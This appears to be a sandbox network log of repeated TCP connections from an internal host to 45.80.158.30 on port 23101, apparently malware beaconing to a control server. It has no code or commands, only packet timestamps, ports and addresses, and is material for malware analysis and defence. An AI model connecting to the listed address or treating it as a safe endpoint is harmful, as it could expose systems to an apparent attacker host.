                                                                                              Dec 19, 2024 13:20:30.446880102 CET231014982545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.415039062 CET231014982545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.415147066 CET4982523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.415241003 CET4982523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.416317940 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.535092115 CET231014982545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.536437988 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.536523104 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.540019035 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.659816980 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:32.625196934 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:32.625272036 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:32.625335932 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:32.744879961 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:33.637839079 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:33.757716894 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:33.757828951 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:33.761737108 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:33.881308079 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.844635010 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.844715118 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.844805956 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.845815897 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.964631081 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.965445995 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.965548038 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.969077110 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:35.088603020 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.119858027 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.120280981 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.120659113 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.121285915 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.240351915 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.240849018 CET231014984445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.240989923 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.244674921 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.364490032 CET231014984445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:37.330634117 CET231014984445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:37.330701113 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.330774069 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.331587076 CET4984923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.450432062 CET231014984445.80.158.30192.168.2.4
Timestamp                            Src Port  Dst Port  Source IP     Dest IP
Dec 19, 2024 13:20:37.451179981 CET  23101     49849     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:37.451257944 CET  49849     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:37.454780102 CET  49849     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:37.575047016 CET  23101     49849     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:38.538470984 CET  23101     49849     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:38.542268991 CET  49849     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:38.542435884 CET  49849     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:38.662221909 CET  23101     49849     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:39.544099092 CET  49856     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:39.663794994 CET  23101     49856     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:39.663908005 CET  49856     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:39.667442083 CET  49856     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:39.787158012 CET  23101     49856     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:40.762387037 CET  23101     49856     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:40.762615919 CET  49856     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:40.762702942 CET  49856     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:40.763571978 CET  49857     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:40.882306099 CET  23101     49856     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:40.883121014 CET  23101     49857     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:40.883209944 CET  49857     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:40.886912107 CET  49857     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:41.006442070 CET  23101     49857     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:41.971415043 CET  23101     49857     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:41.971518040 CET  49857     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:41.971595049 CET  49857     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:41.972476959 CET  49863     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:42.091412067 CET  23101     49857     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:42.092295885 CET  23101     49863     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:42.092499971 CET  49863     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:42.096509933 CET  49863     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:42.216406107 CET  23101     49863     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:43.186789989 CET  23101     49863     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:43.190407991 CET  49863     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:43.190407991 CET  49863     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:43.191190004 CET  49864     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:43.310087919 CET  23101     49863     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:43.310868979 CET  23101     49864     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:43.314431906 CET  49864     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:43.317807913 CET  49864     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:43.437382936 CET  23101     49864     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:44.404067039 CET  23101     49864     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:44.404155970 CET  49864     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:44.404263020 CET  49864     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:44.524102926 CET  23101     49864     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:45.435597897 CET  49871     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:45.555465937 CET  23101     49871     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:45.556466103 CET  49871     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:45.560147047 CET  49871     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:45.680480003 CET  23101     49871     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:46.646964073 CET  23101     49871     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:46.647066116 CET  49871     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:46.647205114 CET  49871     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:46.648417950 CET  49876     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:46.766963959 CET  23101     49871     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:46.768201113 CET  23101     49876     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:46.768294096 CET  49876     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:46.771770954 CET  49876     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:46.891426086 CET  23101     49876     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:47.858196020 CET  23101     49876     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:47.858375072 CET  49876     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:47.862386942 CET  49876     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:47.886197090 CET  49880     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:47.982021093 CET  23101     49876     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:48.005968094 CET  23101     49880     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:48.006088018 CET  49880     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:48.023914099 CET  49880     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:48.143536091 CET  23101     49880     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:49.094444990 CET  23101     49880     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:49.096040964 CET  49880     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:49.096281052 CET  49880     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:49.097170115 CET  49883     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:49.216157913 CET  23101     49880     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:49.217017889 CET  23101     49883     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:49.220910072 CET  49883     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:49.224575996 CET  49883     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:49.345933914 CET  23101     49883     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:50.315038919 CET  23101     49883     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:50.315428019 CET  49883     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:50.315510035 CET  49883     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:50.435357094 CET  23101     49883     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:51.326143026 CET  49889     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:51.447664976 CET  23101     49889     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:51.447776079 CET  49889     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:51.459647894 CET  49889     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:51.579391956 CET  23101     49889     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:52.537528038 CET  23101     49889     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:52.537714958 CET  49889     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:52.537714958 CET  49889     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:52.538718939 CET  49895     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:52.657865047 CET  23101     49889     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:52.658478975 CET  23101     49895     45.80.158.30  192.168.2.4
Dec 19, 2024 13:20:52.658548117 CET  49895     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:52.662461996 CET  49895     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:20:52.782345057 CET  23101     49895     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:02.774123907 CET  23101     49895     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:02.774190903 CET  49895     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:02.774271011 CET  49895     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:02.775204897 CET  49916     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:02.895054102 CET  23101     49895     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:02.895947933 CET  23101     49916     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:02.896049023 CET  49916     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:02.899703026 CET  49916     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:03.019295931 CET  23101     49916     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:03.984776974 CET  23101     49916     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:03.984842062 CET  49916     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:03.984903097 CET  49916     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:03.985737085 CET  49922     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:04.104773998 CET  23101     49916     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:04.105386019 CET  23101     49922     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:04.105477095 CET  49922     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:04.109949112 CET  49922     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:04.229516029 CET  23101     49922     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:05.191378117 CET  23101     49922     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:05.191447973 CET  49922     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:05.191536903 CET  49922     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:05.311218023 CET  23101     49922     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:06.200732946 CET  49928     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:06.320666075 CET  23101     49928     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:06.320878029 CET  49928     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:06.329422951 CET  49928     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:06.449286938 CET  23101     49928     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:07.411606073 CET  23101     49928     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:07.414460897 CET  49928     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:07.430666924 CET  49928     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:07.445218086 CET  49932     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:07.550539970 CET  23101     49928     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:07.565248966 CET  23101     49932     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:07.566363096 CET  49932     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:07.674639940 CET  49932     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:07.794739008 CET  23101     49932     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:08.656086922 CET  23101     49932     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:08.656167030 CET  49932     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:08.656261921 CET  49932     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:08.657206059 CET  49935     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:08.775935888 CET  23101     49932     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:08.776973009 CET  23101     49935     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:08.777096987 CET  49935     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:08.782582998 CET  49935     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:08.902281046 CET  23101     49935     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:09.864093065 CET  23101     49935     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:09.866354942 CET  49935     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:09.866430998 CET  49935     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:09.867541075 CET  49940     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:09.986773968 CET  23101     49935     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:09.987790108 CET  23101     49940     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:09.990473986 CET  49940     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:09.994981050 CET  49940     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:10.114598989 CET  23101     49940     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:11.081955910 CET  23101     49940     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:11.082137108 CET  49940     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:11.082228899 CET  49940     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:11.201787949 CET  23101     49940     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:12.091445923 CET  49946     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:12.211076021 CET  23101     49946     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:12.213947058 CET  49946     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:12.217937946 CET  49946     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:12.337445974 CET  23101     49946     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:13.373393059 CET  23101     49946     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:13.373486042 CET  49946     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:13.373573065 CET  49946     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:13.374305010 CET  49948     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:13.493249893 CET  23101     49946     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:13.493896008 CET  23101     49948     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:13.493992090 CET  49948     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:13.499732971 CET  49948     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:13.619842052 CET  23101     49948     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:14.583492041 CET  23101     49948     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:14.586422920 CET  49948     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:14.586422920 CET  49948     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:14.586952925 CET  49954     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:14.706175089 CET  23101     49948     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:14.706587076 CET  23101     49954     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:14.708473921 CET  49954     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:14.711678982 CET  49954     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:14.831398964 CET  23101     49954     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:15.803456068 CET  23101     49954     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:15.803524971 CET  49954     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:15.803590059 CET  49954     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:15.804265976 CET  49955     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:15.923258066 CET  23101     49954     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:15.923830986 CET  23101     49955     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:15.923924923 CET  49955     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:15.927165031 CET  49955     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:16.046744108 CET  23101     49955     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:17.013676882 CET  23101     49955     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:17.013747931 CET  49955     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:17.013814926 CET  49955     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:17.133697987 CET  23101     49955     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:18.028341055 CET  49961     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:18.147912979 CET  23101     49961     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:18.150477886 CET  49961     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:18.153600931 CET  49961     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:18.273154020 CET  23101     49961     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:19.241079092 CET  23101     49961     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:19.241202116 CET  49961     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:19.241202116 CET  49961     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:19.242248058 CET  49967     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:19.361474037 CET  23101     49961     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:19.362179041 CET  23101     49967     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:19.362472057 CET  49967     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:19.365695000 CET  49967     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:19.486136913 CET  23101     49967     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:20.453301907 CET  23101     49967     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:20.453367949 CET  49967     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:20.453423977 CET  49967     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:20.454159021 CET  49970     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:20.573254108 CET  23101     49967     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:20.574029922 CET  23101     49970     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:20.574239969 CET  49970     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:20.578008890 CET  49970     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:20.697571993 CET  23101     49970     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:21.686932087 CET  23101     49970     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:21.687016964 CET  49970     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:21.687098026 CET  49970     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:21.687634945 CET  49974     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:21.806667089 CET  23101     49970     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:21.807157993 CET  23101     49974     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:21.807225943 CET  49974     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:21.811054945 CET  49974     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:21.930650949 CET  23101     49974     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:22.901122093 CET  23101     49974     45.80.158.30  192.168.2.4
Dec 19, 2024 13:21:22.901212931 CET  49974     23101     192.168.2.4   45.80.158.30
Dec 19, 2024 13:21:22.901279926 CET  49974     23101     192.168.2.4   45.80.158.30
                                                                                              Dec 19, 2024 13:21:23.020941019 CET231014997445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:23.903248072 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:24.023237944 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:24.026341915 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:24.029558897 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:24.149349928 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.118592978 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.118678093 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.118716955 CET4998023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.119388103 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.238616943 CET231014998045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.239378929 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:25.239624977 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.242881060 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:25.362802982 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.329377890 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.330476999 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.330476999 CET4998423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.330960035 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.450328112 CET231014998445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.450453043 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:26.450547934 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.453804970 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:26.573420048 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.537420034 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.537482023 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.537540913 CET4998723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.538269043 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.657646894 CET231014998745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.658174992 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:27.658236027 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.661488056 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:27.781167030 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:28.744313955 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:28.748786926 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:28.748986959 CET4999323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:28.931830883 CET231014999345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:29.762911081 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:29.882898092 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:29.884460926 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:29.888010025 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:30.007875919 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:30.973737955 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:30.973972082 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:30.973973036 CET4999923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:30.974508047 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:31.096887112 CET231014999945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:31.096990108 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:31.097079992 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:31.100408077 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:31.222940922 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.189651966 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.189713955 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.189786911 CET5000023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.190601110 CET5000623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.309492111 CET231015000045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.310240984 CET231015000645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:32.310327053 CET5000623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.313668966 CET5000623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:21:32.433341026 CET231015000645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:33.400932074 CET231015000645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:21:33.401127100 CET5000623101192.168.2.445.80.158.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 13:19:07.254606962 CET | 61378 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 13:19:30.537457943 CET | 58748 | 53 | 192.168.2.4 | 1.1.1.1
